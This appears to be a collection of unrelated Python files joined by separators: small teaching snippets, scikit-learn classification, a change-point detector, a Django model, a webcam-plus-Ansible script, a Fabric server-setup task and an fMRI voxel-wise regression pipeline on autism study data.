testfunc(1,3,5,7,9)
#*args can be given a list of OPTIONAL arguments
def testfunc(*args):
for e in args:
print(e,end=", ")
if __name__ == "__main__": main()
|
class Square(object):
def __init__(self, length):
self.length = length
def __repr__(self):
return ('Square with length {length} has area {area}'
.format(length=self.length, area=self.square_area())
)
def square_area(self):
return self.length ** 2
class SquareWithColor(Square):
def __init__(self, length, color):
super(SquareWithColor, self).__init__(length)
self.color = color
if __name__ == '__main__':
a = Square(5)
print a.square_area()
print a
b = SquareWithColor(4, 'red')
print b.square_area()
|
import numpy as np
from sklearn import cross_validation
from sklearn import datasets
from sklearn import svm
iris = datasets.load_iris()
#print iris.data.shape, iris.target.shape
# just one validation
X_train, X_test, y_train, y_test = cross_validation.train_test_split(
iris.data, iris.target, test_size=0.4, random_state=0)
#print X_train.shape, y_train.shape
#print X_test.shape, y_test.shape
clf = svm.SVC(kernel='linear', C=1).fit(X_train, y_train)
print "Iris. One-validation accuracy: " + str(clf.score(X_test, y_test))
# iris 5-fold cross-validation
clf = svm.SVC(kernel='linear', C=1)
scores = cross_validation.cross_val_score(clf, iris.data, iris.target, cv=5)
print("Iris. 5-fold CV accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
zoo = np.loadtxt("zoo.txt", delimiter=",")
zoo_data = zoo[:,0:zoo.shape[1]-2]
zoo_target = zoo[:,zoo.shape[1]-1]
# zoo 5-fold cross-validation
clf = svm.SVC()
scores = cross_validation.cross_val_score(clf, zoo_data, zoo_target, cv=5)
print("Zoo. 5-fold CV accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 21 14:47:44 2021
Class requires numpy for functioning
@author: kondrate
"""
class MAXCUSUM:
def __init__(self, isample):
# data chunk must be of size 14xW
# W will be interpreted as moving window size
self._counter = 1
self._Si = 0
self._mu = np.mean(isample, axis=1).reshape(14,1)
self._cov = np.cov(isample).reshape(14,14)
# Add small value to the main diagonal to avoid singularity
np.fill_diagonal(self._cov, self._cov.diagonal() + 1e-10)
self._w = isample.shape[1]
# debug
self._decs = [self._Si]
# a
up = np.dot((-1*self._mu).T, np.linalg.inv(self._cov))
down = np.sqrt(np.dot(np.dot((-1*self._mu).T, np.linalg.inv(self._cov)), -1*self._mu))
self._a = up/down # (shape 1,14)
def iterate(self,data_chunk):
# data chunk must be of size 14xW
self._counter += 1
nmu = np.mean(data_chunk, axis=1).reshape(14,1)
D = np.sqrt(np.dot(np.dot((-1*self._mu).T, np.linalg.inv(self._cov)), -1*self._mu))
Z = np.dot(self._a, nmu - self._mu)
self._Si = np.max([self._Si + Z - 0.5*D, 0])
# debug
self._decs.append(self._Si)
#
if self._Si > 0:
return self._counter + self._w, self._decs
else:
return 0,0
if __name__ == "__main__":
import numpy as np
import pandas as pd
import pickle
import os
import matplotlib.pyplot as plt
folder='/Users/kondrate/nfs/Documents/TUT/MSThesis/Scripts/Data/Baseline/'
file = 'JasmineTableBaseline1.mat.csv'
table = pd.read_csv(folder + file)
needed_columns = 'IMS_abs1 IMS_abs2 IMS_abs3 IMS_abs4 IMS_abs5 IMS_abs6 IMS_abs7 IMS_abs9 IMS_abs10 IMS_abs11 IMS_abs12 IMS_abs13 IMS_abs14 IMS_abs15'.split(" ")
table = table[needed_columns]
tsims = table.to_numpy()
ims = tsims
tsims = np.array([tsims[i + 1,:] - tsims[i,:] for i in range(tsims.shape[0]-1)]).T
gt = pickle.load(open(os.path.join(folder, 'ground truth', file + '.pickle'), 'rb'))
vpoints = [gt[key]['val'] for key in gt if key != 'state']
#plt.plot(tsims[0,:])
mc = MAXCUSUM(tsims[:,:10])
for i in range(tsims.shape[1]):
pt, decs = mc.iterate(tsims[:,i:i+10])
if pt > 0:
break
print('Change point found at:',pt) |
# Author:ambiguoustexture
# Date: 2020-02-04
file = 'hightemp.txt'
n = int(input('N: '))
with open(file) as text:
for index, line in enumerate(text):
if index >= n:
break
print(line.rstrip())
|
def add(x,y,z):
return x+y+z
def sub(x,y,z):
return x-y-z
def mul(x,y):
return x*y
def div(x,y):
return x/y
|
from django.db import models
from mptt.models import MPTTModel
from django.contrib.auth.models import User
# Create your models here.
class Page(MPTTModel):
title = models.CharField(max_length=255)
slug = models.SlugField(max_length=50)
content = models.TextField()
published = models.DateTimeField('Date published')
updated = models.DateTimeField('Date upated', auto_now=True, auto_now_add=True)
author = models.ForeignKey(User)
parent = models.ForeignKey('self', related_name='children', null=True, blank=True)
def __unicode__(self):
return "%s %s" % ("-" * self.level, self.title)
class Meta:
db_table = 'juice_pages_page'
#mptt.register(Page)
|
#!/usr/bin/python36
import subprocess
import cv2
cap = cv2.VideoCapture(0)
ret, image = cap.read()
cv2.imwrite('/root/Udev_automation/defaulter.jpg' , image)
#cv2.imshow('hi' , image)
#cv2.waitKey()
cv2.destroyAllWindows()
subprocess.getoutput("ansible-playbook /root/Udev_automation/security.yml --vault-password-file=/root/Udev_automation/mypasswd")
|
import os
from fabric.api import task, run
from fabric.contrib import files
from fabtools import service, deb, require
from fabtools import user as fabuser
USERS = ['robert', 'chrzyki', 'bibiko']
SSHD_CFG = '/etc/ssh/sshd_config'
POSTFIX_CFG = '/etc/postfix/main.cf'
MUNIN_CFG = '/etc/munin/munin-node.conf'
PKGS = ['language-pack-en-base', 'postfix', 'libsasl2-modules', 'bsd-mailx']
def add_user(users):
for user in users:
key_path = os.path.join(os.path.dirname(__file__),
'../ssh_key_' + user + '.pub')
if not fabuser.exists(user):
fabuser.create(user, password='changeme', shell='/bin/bash')
try:
fabuser.modify(user, ssh_public_keys=key_path)
except FileNotFoundError:
pass
def add_user_to_sudo(users):
for user in users:
fabuser.modify(user, group='sudo')
def change_authentication_method(sshd_cfg):
files.sed(sshd_cfg, '#PasswordAuthentication yes',
'PasswordAuthentication no', use_sudo=True)
service.restart('sshd')
def install_packages(pkgs, postfix_cfg):
hostname = run('hostname')
destination_cfg = '%s.clld.org, %s, localhost.localdomain, localhost', \
(hostname, hostname)
deb.preseed_package('postfix', {
'postfix/main_mailer_type': ('select', 'Internet Site'),
'postfix/mailname': ('string', hostname + '.clld.org'),
'postfix/destinations': ('string', destination_cfg),
})
deb.install(pkgs)
def fix_postfix_cfg():
files.sed(postfix_cfg, 'myhostname = ', 'myhostname = '
+ hostname + '.gwdg.de', use_sudo=True)
fix_postfix_cfg()
def setup_munin_node(munin_cfg):
hostname = run('hostname')
key_path = os.path.join(os.path.dirname(__file__),
'../ssh_key_munin_node.pub')
require.deb.packages(['munin-node'])
require.users.user(
'dlce-munin-node',
shell='/bin/bash',
system=True,
ssh_public_keys=key_path)
def fix_munin_cfg():
files.sed(munin_cfg, '#host_name localhost.localdomain',
'host_name ' + hostname + '.clld.org', use_sudo=True)
fix_munin_cfg()
service.restart('munin-node')
@task
def setup_server():
# TODO: Test mail setup (i.e. send test mail).
# TODO: If a host is migrated, update SSH key on Munin master.
add_user(USERS)
add_user_to_sudo(USERS)
change_authentication_method(SSHD_CFG)
install_packages(PKGS, POSTFIX_CFG)
setup_munin_node(MUNIN_CFG)
|
import nibabel as nib
import numpy as np
from scipy import stats
from numpy import ma
import scipy.special as special
from statsmodels.stats import multitest
import itertools
import os
from os.path import join as opj
# from nipype.interfaces import afni
import nibabel as nib
import json
import numpy as np
import matching
import pandas as pd
from multiprocessing import Pool
import statsmodels.api as sm
from statsmodels.sandbox.stats.multicomp import fdrcorrection0
from functools import partial
from multiprocessing import Pool
import multiprocessing.managers
from tqdm import tqdm
class MyManager(multiprocessing.managers.BaseManager):
pass
MyManager.register('np_zeros', np.zeros, multiprocessing.managers.ArrayProxy)
def calc_score_stats(brain_npy_handle_list, pvals, tvals, coeff_vals, score_list, roi, input_coordinates):
'''
Returns: pval, tval and coeff of Independent variable
'''
x,y,z,counter = input_coordinates
# print('Creating voxel connectivity vector of all subjects for coordinates: %s,%s,%s'%(x,y,z))
# if counter % 100 == 0:
# print('Coordinate Counter: %s'%(counter))
voxel_corr_subject_array = []
for brain_npy in brain_npy_handle_list:
voxel_corr_subject_array.append(brain_npy[x,y,z])
Y = voxel_corr_subject_array
X = sm.add_constant(score_list)
# print('Length of Y is %s',len(Y))
# print('Length of X is %s',len(X))
# print('Fitting GLM')
model = sm.OLS(Y,X).fit()
# print('Done')
pvals[x,y,z] = model.pvalues[1]
tvals[x,y,z] = model.tvalues[1]
coeff_vals[x,y,z] = model.params[1]
# print('coeff_vals for coordinate %s %s %s is %s'%(x,y,z,model.params[1]))
def count_voxel_stats(pvals_list, qvals_list, map_logp_list, map_logq_list):
# P_brain_voxel_list, Q_brain_voxel_list = Pval_Qval_tuple
map_logp_list = np.absolute(map_logp_list)
map_logq_list = np.absolute(map_logq_list)
# min p value
min_pval = np.min(pvals_list)
# min q value
min_qval = np.min(qvals_list)
# p value less than 0.1
p_lt_point_1 = np.shape(np.where(pvals_list < 0.1))[1]
# p value less than 0.01
p_lt_point_01 = np.shape(np.where(pvals_list < 0.01))[1]
# p value less than 0.05
p_lt_point_05 = np.shape(np.where(pvals_list < 0.05))[1]
# p value less than 0.1
q_lt_point_1 = np.shape(np.where(qvals_list < 0.1))[1]
# p value less than 0.01
q_lt_point_01 = np.shape(np.where(qvals_list < 0.01))[1]
# p value less than 0.05
q_lt_point_05 = np.shape(np.where(qvals_list < 0.05))[1]
# Voxels with abs(sign(C1MinusC2)(-1*log10(Q)))) >1.3 (t 0.5)
logq_gt_1point3 = np.shape(np.where(map_logq_list > 1.3))[1]
# Voxels with abs(sign(C1MinusC2)(-1*log10(Q)))) >1 (t 0.1)
logq_gt_1 = np.shape(np.where(map_logq_list > 1))[1]
# Voxels with abs(sign(C1MinusC2)(-1*log10(Q)))) >2 (t 0.01)
logq_gt_2 = np.shape(np.where(map_logq_list > 2))[1]
# Voxels with abs(sign(C1MinusC2)(-1*log10(P)))) >1.3 (t 0.5)
logp_gt_1point3 = np.shape(np.where(map_logp_list > 1.3))[1]
# Voxels with abs(sign(C1MinusC2)(-1*log10(P)))) >1 (t 0.1)
logp_gt_1 = np.shape(np.where(map_logp_list > 1))[1]
# Voxels with abs(sign(C1MinusC2)(-1*log10(P)))) >2 (t 0.01)
logp_gt_2 = np.shape(np.where(map_logp_list > 2))[1]
return min_pval,min_qval,p_lt_point_1,p_lt_point_01,p_lt_point_05,q_lt_point_1, q_lt_point_01,q_lt_point_05, logq_gt_1point3, logq_gt_1 ,logq_gt_2 ,logp_gt_1point3, logp_gt_1, logp_gt_2
def fdr_correction_and_viz(Pvals_path, Tvals_path, coef_path, mask_path, save_destination, affine, header, combination):
alpha = 0.05
Pvals = np.load(Pvals_path)
Tvals= np.load(Tvals_path)
coeff_vals = np.load(coef_path)
mask = nib.load(mask_path).get_data()
brain_indices = np.where(mask != 0 )
# from statsmodels.sandbox.stats.multicomp import fdrcorrection0
Pvals_shape = Pvals.shape
Qvals = np.zeros(Pvals_shape)
# sign(c1-c2) * -1 * log10(p)
map_logp = np.multiply(np.sign(coeff_vals),(-1*np.log10(Pvals)))
roi_voxel_stats_matrix = np.zeros((Pvals_shape[3], 14)) # cozthere are 14 statistical attributes
for roi in range(Pvals_shape[3]):
print('Computing Stats for ROI: ',roi)
# pvals = ma.masked_array(Pvals[0], mask = mask, fill_value = 0)
pvals = Pvals[:,:,:,roi]
pvals_shape = pvals.shape
# inp = pvals[~pvals.mask]
# Flatten inp and check if you get back the original matrix after
# inp = inp.ravel()
pvals_list = pvals[brain_indices]
_, qvals_list = fdrcorrection0(pvals_list,alpha)
# from IPython.core.debugger import Tracer; Tracer()()
# map_logq_list = map_logq[brain_indices]
map_logp_list = map_logp[:,:,:,roi][brain_indices]
# print("Size of map_logp_list ",map_logp_list.shape)
# print("Brain Indices: ", brain_indices)
coeff_vals_list = coeff_vals[:,:,:,roi][brain_indices]
# Calculate voxel stats using the below function
Qvals[:,:,:,roi][brain_indices] = qvals_list
map_logq_list = np.multiply(np.sign(coeff_vals_list),(-1*np.log10(qvals_list)))
# print("Size of map_logq_list ",map_logq_list.shape)
roi_voxel_stats_matrix[roi,:] = count_voxel_stats(pvals_list, qvals_list,map_logp_list, map_logq_list)
# print('Stats Computed for ROI: ',roi)
# Save the CSV file and the Additional Brain file to visualize
# sign(c1-c2) * -1 * log10(q)
map_logq = np.multiply(np.sign(coeff_vals),(-1*np.log10(Qvals)))
save_destination_new = opj(save_destination,combination)
if not os.path.exists(save_destination_new):
os.mkdir(save_destination_new)
print('Saving Files in directory: ', save_destination_new)
print('Saving Stats CSV : ',)
csv_name = opj(save_destination_new,'roi_voxel_stats_' + combination + '.csv')
np.savetxt(csv_name,roi_voxel_stats_matrix,delimiter=',',header='min_pval,min_qval,p_lt_point_1,p_lt_point_01,\
p_lt_point_05, q_lt_point_1, q_lt_point_01,q_lt_point_05, logq_gt_1point3, logq_gt_1 ,logq_gt_2 ,\
logp_gt_1point3, logp_gt_1, logp_gt_2')
print('Saving Pvals.nii.gz')
Pvals_name = opj(save_destination_new,'Pvals.nii.gz')
Pvals_brain_with_header = nib.Nifti1Image(Pvals, affine= affine,header = header)
nib.save(Pvals_brain_with_header,Pvals_name)
print('Saving Tvals.nii.gz')
Tvals_name = opj(save_destination_new,'Tvals.nii.gz')
Tvals_brain_with_header = nib.Nifti1Image(Tvals, affine= affine,header = header)
nib.save(Tvals_brain_with_header,Tvals_name)
print('Saving Qvals.nii.gz')
Qvals_name = opj(save_destination_new,'Qvals.nii.gz')
Qvals_brain_with_header = nib.Nifti1Image(Qvals, affine= affine,header = header)
nib.save(Qvals_brain_with_header,Qvals_name)
print('Saving coeff_vals.nii.gz')
coeff_vals_name = opj(save_destination_new,'coeff_vals.nii.gz')
coeff_vals_brain_with_header = nib.Nifti1Image(coeff_vals, affine= affine,header = header)
nib.save(coeff_vals_brain_with_header,coeff_vals_name)
print('Saving map_logp.nii.gz')
map_logp_name = opj(save_destination_new,'map_logp.nii.gz')
map_logp_brain_with_header = nib.Nifti1Image(map_logp, affine= affine,header = header)
nib.save(map_logp_brain_with_header,map_logp_name)
print('Saving map_logq.nii.gz')
map_logq_name = opj(save_destination_new,'map_logq.nii.gz')
map_logq_brain_with_header = nib.Nifti1Image(map_logq, affine= affine,header = header)
nib.save(map_logq_brain_with_header,map_logq_name)
# Now construct a function that takes a list of SUB_ID's and returns the FC Maps paths
def get_subject_fc_file(subject_id_list,fc_file_path, bugs):
import re
return_fc_maps = []
fc_file_list = np.load(fc_file_path)
print('Brain files: ',fc_file_list)
for subject_id in subject_id_list:
# print("For subject: ",subject_id)
found = False
for brain in fc_file_list:
sub_id_extracted = re.search('.+_subject_id_(\d+)', brain).group(1)
if str(subject_id) in bugs:
# print("In Bugs with subject id ",subject_id)
found = True
elif (subject_id == int(sub_id_extracted)):
found = True
return_fc_maps.append(brain)
# print("Found for subject: ",subject_id)
if found == False: # Some subject was not found Problem!
print ('Unable to locate Subject so not including in analysis Query: ',int(subject_id),' Extracted but not included: ',int(sub_id_extracted))
# return 0
return return_fc_maps
# Now construct a function that takes a list of SUB_ID's and returns the FC Maps paths and scores
def get_subject_fc_file_and_score(subid_and_scores_list,fc_file_path, bugs):
import re
subject_id_list = subid_and_scores_list[0].squeeze()
if isinstance(subid_and_scores_list[1], np.ndarray):
phenotype_score = subid_and_scores_list[1].squeeze()
else:
return get_subject_fc_file(subject_id_list,fc_file_path, bugs)
# phenotype_score = np.array(phenotype_score)
return_fc_maps = []
return_phenotypic_scores = []
fc_file_list = np.load(fc_file_path)
print('Brain files: ',fc_file_list)
for ix, subject_id in enumerate(subject_id_list):
# print("For subject: ",subject_id)
found = False
for brain in fc_file_list:
sub_id_extracted = re.search('.+_subject_id_(\d+)', brain).group(1)
if str(subject_id) in bugs:
# print("In Bugs with subject id ",subject_id)
found = True
elif (subject_id == int(sub_id_extracted)):
found = True
return_fc_maps.append(brain)
return_phenotypic_scores.append(phenotype_score[ix])
# print("Found for subject: ",subject_id)
if found == False: # Some subject was not found Problem!
print ('Unable to locate Subject: ',int(subject_id),'extracted: ',int(sub_id_extracted))
# return 0
return return_fc_maps, return_phenotypic_scores
def applyGLM(subject_list,score_list,mask_path,save_destination, num_proc):
# Create pool of num_proc workers
pool = Pool(num_proc)
mask_data = nib.load(mask_path).get_data()
# import pdb;pdb.set_trace()
x,y,z,t = np.load(subject_list[0],mmap_mode='r').shape
print('Calculating input list to give to workers')
input_list = [] # for storing the iteration brain coordinates
counter = 1
for i in range(x):
for j in range(y):
for k in range(z):
if mask_data[i,j,k] != 0: # Brain region
input_list.append([i,j,k,counter])
# counter += 1 # for checking progress..
print('Number of GLMs to be done for each roi= ', len(input_list))
pvals = np.zeros((x,y,z,t))
tvals = np.zeros((x,y,z,t))
coeff_vals = np.zeros((x,y,z,t))
m = MyManager()
m.start()
print("Starting with the workers")
# t = 2
for roi in tqdm(range(t)):
# print('*****************************************************************')
# print('Reading the ROI %s npy brain files in mmap mode'%(roi)) # ############# Memory issue .. work with one ROI at a time.
# print('*****************************************************************')
brain_npy_handle_list = []
for in_file in subject_list:
brain_npy_handle_list.append(np.load(in_file,mmap_mode='r')[:,:,:,roi])
pvals_shared = m.np_zeros((x,y,z))
tvals_shared = m.np_zeros((x,y,z))
coeff_vals_shared = m.np_zeros((x,y,z))
func = partial(calc_score_stats, brain_npy_handle_list, pvals_shared, tvals_shared, coeff_vals_shared,\
score_list, roi)
pool.map(func, input_list)
# import pdb;pdb.set_trace()
pvals[:,:,:,roi] = pvals_shared
tvals[:,:,:,roi] = tvals_shared
coeff_vals[:,:,:,roi] = coeff_vals_shared
print('Saving files in ',save_destination)
if not os.path.exists(save_destination):
os.makedirs(save_destination) # to create a nested directory structure
Tvals_path = opj(save_destination,'Tvals')
Pvals_path = opj(save_destination,'Pvals')
coeff_vals_path = opj(save_destination,'coeff_vals')
np.save(Tvals_path,tvals)
np.save(Pvals_path,pvals)
np.save(coeff_vals_path,coeff_vals)
print('Saved')
return Pvals_path+'.npy', Tvals_path+'.npy', coeff_vals_path+'.npy'
def main(paths, bugs, applyFisher, categoryInfo= None, match=1, motion_param_regression=0, global_signal_regression=0, band_pass_filtering=0, \
smoothing=0, num_proc = 7):
json_path=paths[0]
base_directory=paths[1]
motion_correction_bet_directory=paths[2]
parent_wf_directory=paths[3]
functional_connectivity_directory=paths[4]
coreg_reg_directory=paths[5]
atlas_resize_reg_directory=paths[6]
subject_list = paths[7]
datasink_name=paths[8]
fc_datasink_name=paths[9]
atlasPath=paths[10]
brain_path=paths[11]
mask_path=paths[12]
atlas_path=paths[13]
tr_path=paths[14]
motion_params_path=paths[15]
func2std_mat_path=paths[16]
MNI3mm_path=paths[17]
demographics_file_path = paths[18]
phenotype_file_path = paths[19]
data_directory = paths[20]
# hypothesis_test_dir = paths[21]
score_corr_dir = paths[23]
# Runall:
if categoryInfo == None:
# phenotype_file_path = '/home1/varunk/data/ABIDE1/RawDataBIDs/composite_phenotypic_file.csv'
df = pd.read_csv(phenotype_file_path) # , index_col='SUB_ID'
df = df.sort_values(['SUB_ID'])
# df = df.sort_values(['SUB+AF8-ID'])
if bugs == None:
bugs = ['51232','51233','51242','51243','51244','51245','51246','51247','51270','51310','50045', '51276', '50746', '50727', '51276']
# Bugs:
# 50045 - ROI Missing
# 51276, 50746, 50727 - Many in between ROIs Missing
# 51276 - Many in between ROIs Missing
# '0051242' in bugs
# selecting Autistic males(DSM IV) of age <= 18 years
# df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 1) ]
# df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 1) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open
# df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 1) & (df['EYE_STATUS_AT_SCAN'] == 2)] # eyes closed
# df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] >=12) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 1) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open age 12-18
# df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] >=6) & (df['AGE_AT_SCAN'] <12) & (df['DSM_IV_TR'] == 1) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open age 6 - lt 12
# df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 1)] # AGE <= 18
# In[205]:
# df_aut_lt18_m.shape
# In[206]:
# df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0) ]
# df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open
# df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0) & (df['EYE_STATUS_AT_SCAN'] == 2)] # eyes closed
# df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] >=12) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open age 12- 18
# df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] >=6) & (df['AGE_AT_SCAN'] <12) & (df['DSM_IV_TR'] == 0) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open age 6 - lt 12
# df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0)] # AGE <= 18
# df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0) & (df['EYE_STATUS_AT_SCAN'] == 2)] # TD eyes closed
# In[207]:
# df_td_lt18_m.shape
# In[208]:
# table_males_np = table_males.as_matrix(columns=['SUB_ID','DX_GROUP', 'DSM_IV_TR', 'AGE_AT_SCAN' ,'SEX' ,'EYE_STATUS_AT_SCAN'])
# In[209]:
if demographics_file_path == None:
demographics_file_path = '/home1/varunk/Autism-Connectome-Analysis-brain_connectivity/notebooks/demographics.csv'
if phenotype_file_path == None:
phenotype_file_path = '/home1/varunk/data/ABIDE1/RawDataBIDs/composite_phenotypic_file.csv'
df_demographics = pd.read_csv(demographics_file_path)
df_phenotype = pd.read_csv(phenotype_file_path)
df_phenotype = df_phenotype.sort_values(['SUB_ID'])
# Volume matching
# print('Volume Matching')
# volumes_bins = np.array([[0,150],[151,200],[201,250],[251,300]])
# matched_df_TD = df_phenotype
# matched_df_AUT = df_phenotype
# matched_df_TD, matched_df_AUT = matching.volumes_matching(volumes_bins, df_demographics, matched_df_TD, matched_df_AUT)
#
# Age 6 - 18 Autistic vs Healthy
# df_td_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
# & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
#
#
# df_aut_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 1) \
# & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
# Age 6 - 18 Aspergers vs Healthy
# df_td_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
# & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
#
#
# df_aut_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 2) \
# & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
# Age 6 - 18 Aspergers vs Autistic
# df_td_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 2) \
# & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
#
# df_aut_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 1) \
# & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
# ------------------ Only healthy ---------------------------------------
# healthy_subjects = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
# & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
#
#
# # import pdb; pdb.set_trace()
# healthy_subjects = healthy_subjects.reindex(np.random.permutation(healthy_subjects.index))
#
# df_td_lt18_m = healthy_subjects[0: int(healthy_subjects.shape[0]/2.0)]
#
# df_aut_lt18_m = healthy_subjects[int(healthy_subjects.shape[0]/2.0)+1 :]
# ------------------ Only healthy again Saity Check---------------------------------------
# healthy_subjects = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
# & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
#
# df_td_lt18_m = healthy_subjects[0: int(healthy_subjects.shape[0]/2.0)]
# df_aut_lt18_m = healthy_subjects[0: int(healthy_subjects.shape[0]/2.0)]
# Age 12 - 18
# df_td_lt18_m = matched_df_TD.loc[(matched_df_TD['SEX'] == 1) & (matched_df_TD['DSM_IV_TR'] == 0) \
# & (matched_df_TD['EYE_STATUS_AT_SCAN'] == 1)
# & (matched_df_TD['AGE_AT_SCAN'] >= 12 )
# & (matched_df_TD['AGE_AT_SCAN'] <= 18) ]
#
# df_aut_lt18_m = matched_df_AUT.loc[(matched_df_AUT['SEX'] == 1) & (matched_df_AUT['DSM_IV_TR'] == 1) \
# & (matched_df_AUT['EYE_STATUS_AT_SCAN'] == 1)
# & (matched_df_AUT['AGE_AT_SCAN'] >= 12 )
# & (matched_df_AUT['AGE_AT_SCAN'] <= 18) ]
# Age 6 - 18 Autistic with FIQ score not equal to NAN and -9999
score_name = 'ADI_R_VERBAL_TOTAL_BV'
print('**************** Correlating score: ',score_name)
df_aut_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 1) \
& (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) & pd.notnull(df_phenotype[score_name]) & (df_phenotype[score_name] != -9999)]
df_aut_subid = df_aut_lt18_m.as_matrix(columns=['SUB_ID'])
df_aut_score = df_aut_lt18_m.as_matrix(columns=[score_name])
# Age 6 - 18 Healthy with FIQ score not equal to NAN and -9999
# score_name = 'FIQ'
#
# df_TD_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
# & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) & pd.notnull(df_phenotype[score_name]) & (df_phenotype[score_name] != -9999)]
#
#
# # Fir simplicity of code I am just naming TD as Autistic so that rest of the code doesn't change
#
# df_aut_lt18_m = df_TD_lt18_m
# df_aut_subid = df_aut_lt18_m.as_matrix(columns=['SUB_ID'])
# df_aut_score = df_aut_lt18_m.as_matrix(columns=[score_name])
combination = 'motionRegress' + str(int(motion_param_regression)) + \
'global' + str(int(global_signal_regression)) + 'smoothing' + str(int(smoothing)) +\
'filt' + str(int(band_pass_filtering))
print("Combination: ",combination)
print(motion_param_regression,band_pass_filtering, global_signal_regression, smoothing)
save_destination = opj(score_corr_dir,combination)
print('Saving files in ',save_destination)
if not os.path.exists(save_destination):
os.makedirs(save_destination) # to create a nested directory structure
# save_destination_TD = opj(hypothesis_test_dir,combination,'TD_subects.csv')
save_destination_AUT = opj(score_corr_dir,combination,'AUT_subjects.csv')
print("Storing the subjects' information used")
# df_td_lt18_m.to_csv('TD_subects.csv')
# df_td.to_csv(save_destination_TD)
# print('Saved TD_subects.csv')
# df_aut_lt18_m.to_csv('AUT_subjects.csv')
df_aut_lt18_m.to_csv(save_destination_AUT)
print('Saved AUT_subects.csv')
# for motion_param_regression, band_pass_filtering, global_signal_regression, smoothing in itr:
fc_file_list_nii = opj(base_directory,fc_datasink_name,combination,'fc_map_brain_file_list.npy')
fc_file_list_npy = opj(base_directory,fc_datasink_name,combination,'fc_map_npy_file_list.npy')
fc_file_list = fc_file_list_npy
print('Reading the brain paths from: ',fc_file_list)
# apply_fisher = True
# import pdb;pdb.set_trace()
autistic_list_npy, df_aut_score = (get_subject_fc_file_and_score([df_aut_subid, df_aut_score], fc_file_list, bugs))
print("Number of autistic participants ", len(autistic_list_npy))
autistic_list_nii = get_subject_fc_file_and_score([df_aut_subid, None], fc_file_list_nii, bugs)
# td_list = (get_subject_fc_file(df_td_subid.squeeze(), fc_file_list, bugs))
# print("Number of TD participants ", len(td_list))
# participants_considered = min(len(autistic_list), len(td_list))
# participants_considered = 2
# print("Number of participants being Considered per group:", participants_considered)
autistic_list = autistic_list_npy#[0:participants_considered]
# td_list = td_list#[0:participants_considered]
# Created the below mask manually using BET
# mask = opj(base_directory,parent_wf_directory,motion_correction_bet_directory,coreg_reg_directory,'resample_mni/MNI152_T1_2mm_brain_resample_mask.nii.gz')
# mask = opj(base_directory,parent_wf_directory,motion_correction_bet_directory,coreg_reg_directory,'atlas_resize_reg_directory/resample_atlas/fullbrain_atlas_thr0-2mm_resample_binarize.nii.gz')
mask_path = '/home1/varunk/atlas/Full_brain_atlas_thr0-2mm/fullbrain_atlas_thr0-3mm_binarized.nii.gz'
save_destination = opj(score_corr_dir,combination)
print('Applying GLM in each voxel')
